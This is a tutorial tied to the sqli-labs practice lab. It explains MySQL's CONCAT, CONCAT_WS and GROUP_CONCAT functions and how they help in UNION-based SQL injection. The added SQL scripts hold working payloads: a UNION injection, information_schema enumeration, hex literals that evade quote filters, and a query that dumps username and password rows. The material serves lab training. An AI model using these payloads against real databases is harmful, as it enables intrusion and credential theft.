sqli-labs: string functions commonly used in SQL injection

foreword

When selecting data, we often need to join several values together before echoing them back. Whenever several fields, or several rows, have to come out through a single output slot, a string concatenation function is needed. In SQL injection the common ones are concat(), group_concat() and concat_ws().

This article explains these three functions in detail. Everything below is described for MySQL; other database engines have their own equivalents with different NULL and separator rules, so test them separately.

concat() function

Without a string concatenation function, SELECT id,name FROM info LIMIT 1; returns

+----+--------+
| id | name   |
+----+--------+
|  1 | BioCyc |
+----+--------+

The problem is that in UNION-based injection the two SELECTs must return the same number of columns, and usually only one of those columns is echoed to the page. Here id and name are two columns. If only one of them reaches the page, how do we get both values out through it? (Reading id in one request and name in a second one works, but it doubles the number of requests.) The answer is concat().

concat() syntax and usage characteristics:
CONCAT(str1,str2,...)
returns the string formed by concatenating its arguments. It takes one or more arguments; numeric arguments are converted to their string form. If any argument is NULL, the return value is NULL.

Example of use:
SELECT CONCAT(id, ',', name) AS con FROM info LIMIT 1; returns

+----------+
| con      |
+----------+
| 1,BioCyc |
+----------+

In practice each item is separated from the next by a marker character, so that the individual values can still be told apart in the output.

SELECT CONCAT('My', NULL, 'QL'); returns
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL                     |
+--------------------------+

CONCAT_WS() function

CONCAT_WS() stands for CONCAT With Separator and is a special form of CONCAT(). Its first argument is the separator, which is placed between each pair of the remaining arguments. The separator can be a string or any other expression. If the separator is NULL, the result is NULL. NULL values among the arguments after the separator are skipped, and no separator is emitted for them; empty strings, on the other hand, are not skipped and still get their separator.

CONCAT_WS() syntax and usage features:

CONCAT_WS(separator,str1,str2,…)

separator is the string placed between the remaining arguments.

Example of use:

SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1; returns
+----------+
| con_ws   |
+----------+
| 1_BioCyc |
+----------+

SELECT CONCAT_WS(',','First name',NULL,'Last Name'); returns
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name                         |
+----------------------------------------------+
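The following script is an added example, not code from the original article or from sqli-labs. It puts CONCAT() and CONCAT_WS() side by side on the same rows to show the NULL behaviour described in the two sections above, and then uses the fold inside a UNION query. The table info_demo, its rows, and the three-column injection point are constructed here for the demonstration and are assumptions, not part of any real target.

```sql
-- Added example, not from the original article: NULL handling of CONCAT() versus CONCAT_WS().
-- info_demo and its three rows are constructed here so the script runs on any scratch MySQL schema.
CREATE TABLE info_demo (
  id   INT PRIMARY KEY,
  name VARCHAR(32),
  note VARCHAR(32)
);
INSERT INTO info_demo (id, name, note) VALUES
  (1, 'BioCyc', NULL),      -- one NULL column
  (2, 'KEGG',   ''),        -- one empty (but not NULL) column
  (3, NULL,     'curated'); -- NULL in the middle

-- CONCAT(): a single NULL argument makes the whole value NULL, so for rows 1 and 3
-- the data in the other columns is lost as well.
SELECT id, CONCAT(id, ':', name, ':', note) AS con
  FROM info_demo;

-- Same fold with each nullable column guarded, so a NULL can no longer blank the row.
SELECT id, CONCAT(id, ':', IFNULL(name, ''), ':', IFNULL(note, '')) AS con_guarded
  FROM info_demo;

-- CONCAT_WS(): NULL arguments are skipped without leaving a separator behind,
-- while the empty string in row 2 is kept and produces a trailing ':'.
-- A skipped NULL and a kept empty string are therefore hard to tell apart in the output.
SELECT id, CONCAT_WS(':', id, name, note) AS con_ws
  FROM info_demo;

-- The fold inside a UNION-based injection. Assumed injection point (constructed here):
--   SELECT id, name, note FROM info_demo WHERE id = '<input>'
-- The original query has three columns, so the injected SELECT must have three too;
-- all three values ride out through the second column. 0x3a is the hex literal for ':',
-- which keeps the payload free of quote characters. IFNULL() marks NULLs explicitly
-- so that a missing value is visible instead of silently dropped by CONCAT_WS().
SELECT id, name, note
  FROM info_demo
 WHERE id = '-1'
 UNION
SELECT 1, CONCAT_WS(0x3a, id, IFNULL(name, 'NULL'), IFNULL(note, 'NULL')), 3
  FROM info_demo;
```

Run it on a throwaway schema; the first SELECT loses two of the three rows, the guarded CONCAT() and the CONCAT_WS() keep all three but differ in how a NULL and an empty string show up, and the UNION returns the folded rows through the second column of the original query.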

GROUP_CONCAT() function

The GROUP_CONCAT() function returns a string made by concatenating the values of a group into a single row.
Using table info again, SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764'); returns
+----------+----+--------------------------+
| locus    | id | journal                  |
+----------+----+--------------------------+
| AB086827 |  1 | Unpublished              |
| AB086827 |  2 | Submitted (20-JUN-2002)  |
| AF040764 | 23 | Unpublished              |
| AF040764 | 24 | Submitted (31-DEC-1997)  |
+----------+----+--------------------------+

1. Syntax and features:
GROUP_CONCAT([DISTINCT] expr [,expr ...]
             [ORDER BY {unsigned_integer | col_name | expr} [ASC | DESC] [,col_name ...]]
             [SEPARATOR str_val])
In MySQL this returns the non-NULL values of each group concatenated into one string. DISTINCT drops duplicate values, and ORDER BY sorts the values before they are joined.
SEPARATOR is the string inserted between the values. It defaults to a comma (","); specifying SEPARATOR '' removes it entirely.
The maximum length of the result is controlled by the variable group_concat_max_len (default 1024). It is changed at runtime with: SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;

If the result is longer than this limit it is silently truncated to that length; MySQL only raises a warning ("Row N was cut by GROUP_CONCAT()"), so a list that is exactly the maximum length should be treated as incomplete. When the grouped values are too long, raise the limit, for example: SET @@global.group_concat_max_len = 40000; Note that the GLOBAL setting requires the SUPER or SYSTEM_VARIABLES_ADMIN privilege and only applies to connections opened afterwards, whereas SET @@session.group_concat_max_len = 40000; affects the current connection immediately and needs no special privilege. Either way it is a separate statement, so from an injection point it needs stacked queries.

2. Example of use:
SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; returns

+----------+------------------+
| locus    | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2              |
| AF040764 | 23,24            |
+----------+------------------+

SELECT locus,GROUP_CONCAT(DISTINCT id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; returns
+----------+----------------------------------------------------------+
| locus    | GROUP_CONCAT(DISTINCT id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1                                                      |
| AF040764 | 24_23                                                    |
+----------+----------------------------------------------------------+

SELECT locus,GROUP_CONCAT(CONCAT_WS(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; returns
+----------+--------------------------------------------------------------------------+
| locus    | GROUP_CONCAT(CONCAT_WS(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished                               |
| AF040764 | 24, Submitted (31-DEC-1997). 23, Unpublished                             |
+----------+--------------------------------------------------------------------------+

3. General usage in SQL injection

List all databases:

select group_concat(schema_name) from information_schema.schemata

List all tables in one database (replace xxxxx with the schema name):

select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'
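The script below is an added example that is not part of the original article. It applies GROUP_CONCAT() to the enumeration queries of this section and goes one step further than the article (columns and row data, using the same information_schema pattern), while checking the length cap instead of trusting it. The schema name security and the table users with columns id, username and password are assumed to match what sqli-labs installs; adjust them for another target.

```sql
-- Added example, not from the original article: GROUP_CONCAT() for schema enumeration,
-- with the length cap checked instead of trusted. Target is MySQL; the schema 'security'
-- and the table users(id, username, password) are assumed to be the ones sqli-labs installs.

-- 0. The cap that applies to this connection (default 1024 bytes). Results longer than
--    this are silently cut, so read it before interpreting a long list as complete.
SELECT @@session.group_concat_max_len;

-- 1. All schemas this account can see, folded into one row.
SELECT GROUP_CONCAT(schema_name)
  FROM information_schema.schemata;

-- 2. All tables of one schema. 0x7365637572697479 is 'security' as a hex literal,
--    usable when single quotes are filtered out of the input.
SELECT GROUP_CONCAT(table_name)
  FROM information_schema.tables
 WHERE table_schema = 0x7365637572697479;

-- 3. All columns of one table (one step past the article, same information_schema pattern).
SELECT GROUP_CONCAT(column_name)
  FROM information_schema.columns
 WHERE table_schema = 'security' AND table_name = 'users';

-- 4. Dump the rows as id:username:password, highest id first, one row per line
--    (0x3a is ':', 0x0a is a newline; both keep quote characters out of the payload).
SELECT GROUP_CONCAT(CONCAT_WS(0x3a, id, username, password) ORDER BY id DESC SEPARATOR 0x0a)
  FROM users;

-- 5. Truncation check: when the folded length reaches the cap the list was clipped
--    (MySQL also raises the warning "Row N was cut by GROUP_CONCAT()", visible with SHOW WARNINGS).
--    In that case page through the rows with LIMIT/OFFSET on a plain SELECT instead.
SELECT LENGTH(GROUP_CONCAT(CONCAT_WS(0x3a, table_name, column_name))) >= @@session.group_concat_max_len AS clipped
  FROM information_schema.columns
 WHERE table_schema = 'security';

-- 6. Raising the cap is a separate statement, so from an injection point it needs
--    stacked queries. SESSION applies to this connection at once; GLOBAL needs SUPER or
--    SYSTEM_VARIABLES_ADMIN and only affects connections opened afterwards.
SET SESSION group_concat_max_len = 1048576;
```

Each SELECT returns a single row, which is what makes GROUP_CONCAT() useful when the page echoes only one row of the injected query; the clipped check in step 5 is the part usually skipped, and skipping it is how a table or column quietly goes missing from an enumeration.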

